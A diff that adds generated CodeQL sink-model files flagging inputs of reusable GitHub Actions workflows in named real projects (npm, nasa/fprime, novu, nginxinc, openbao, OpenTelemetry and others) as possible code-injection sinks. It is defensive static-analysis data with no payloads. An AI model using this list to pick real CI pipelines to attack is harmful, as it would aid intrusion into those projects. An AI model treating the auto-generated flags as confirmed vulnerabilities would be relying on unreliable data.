diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml new file mode 100644 index 000000000000..4bbd06a86f57 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "inputs.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml new file mode 100644 index 000000000000..59bdab8f39ba --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "inputs.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml new file mode 100644 index 000000000000..6988e25d41c3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "inputs.target_platform", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "inputs.fprime_location", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "inputs.default_target_ref", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "inputs.target_repository", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml new file mode 100644 index 000000000000..3c025f59b787 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "inputs.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml new file mode 100644 index 000000000000..5de0d170d40a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "inputs.with_default", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "inputs.required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.string_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.number_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.number_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.bool_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.bool_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.string_optional", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml new file mode 100644 index 000000000000..19d38d1241d1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "inputs.build_flags", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml new file mode 100644 index 000000000000..b1c787677a6b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.custom_run_id", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.non_validator_mode", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.additional_optimism_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.network", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.additional_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.cl_client", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml new file mode 100644 index 000000000000..249c734f55bb --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "inputs.agent_version", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "inputs.test_mode", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/multiverse_run.yml", "*", "inputs.agentVersion", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "inputs.dry-run", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "inputs.prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml new file mode 100644 index 000000000000..46951b5436d9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "inputs.page", "code-injection", "generated"] + - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "inputs.agent-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml new file mode 100644 index 000000000000..cd1d0f318ef5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "inputs.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "inputs.workflows", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "inputs.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "inputs.release_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml new file mode 100644 index 000000000000..4055874a790f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "inputs.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "inputs.PupNetVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "inputs.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "inputs.PupNetVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml new file mode 100644 index 000000000000..bccd7271b08a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml 
@@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.dry_run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml new file mode 100644 index 000000000000..56528159143a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "inputs.shard", "code-injection", "generated"] + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "inputs.db", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml new file mode 100644 index 000000000000..c4a9b07ed997 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml 
@@ -0,0 +1,20 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "inputs.docker_image", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "inputs.terraform_workspace", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_ws_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_api_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_hubspot_embed", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_mail_server_domain", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_widget_embed_path", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_ws_url", "code-injection", "generated"] + - 
["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_api_url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml new file mode 100644 index 000000000000..db4f26083a0f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml new file mode 100644 index 000000000000..c12a079e2e21 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/cli/.github/workflows/node-integration.yml", "*", "inputs.npmVersion", "code-injection", "generated"] + - ["npm/cli/.github/workflows/node-integration.yml", "*", "inputs.nodeVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml new file mode 100644 index 000000000000..3b7122a7a139 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml new file mode 100644 index 000000000000..3e80edaaaff5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml new file mode 100644 index 000000000000..99717acf0244 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/ini/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml new file mode 100644 index 000000000000..d9a066c2b220 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml new file mode 100644 index 000000000000..83e68740ac09 --- /dev/null 
+++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml new file mode 100644 index 000000000000..45f05ea88263 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml new file mode 100644 index 000000000000..1cd25da918fa --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml new file mode 100644 index 000000000000..2d5a077f1f48 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/node-which/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml new file mode 100644 index 000000000000..98571dfc5d94 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/nopt/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml new file mode 100644 index 000000000000..8cbd1927fe0c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml new file mode 100644 index 000000000000..6d3466f09274 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml new file mode 100644 index 000000000000..c7178a298efc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.base-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.repo", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.current-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.chain", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml new file mode 100644 index 000000000000..08feb2033ffb --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build-arm.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-gcc.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-clang.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml new file mode 100644 index 000000000000..3483cc13b9e2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "inputs.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml new file mode 100644 index 000000000000..45350e121a04 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "inputs.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml new file mode 100644 index 000000000000..9665157b3ad4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-build-commands", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml new file mode 100644 index 000000000000..9ef65a67c038 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "inputs.success", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "inputs.project", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml new file mode 100644 index 000000000000..eade5ecdae1d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "inputs.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml new file mode 100644 index 000000000000..1478244cc9ca --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "inputs.language", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "inputs.org", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml new file mode 100644 index 000000000000..8bb0915294cd --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.path", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml new file mode 100644 index 000000000000..cba6c4fbe5a5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.doc_base_name", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.doc_base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.base_folder", "code-injection", "generated"] \ No newline at end of file 
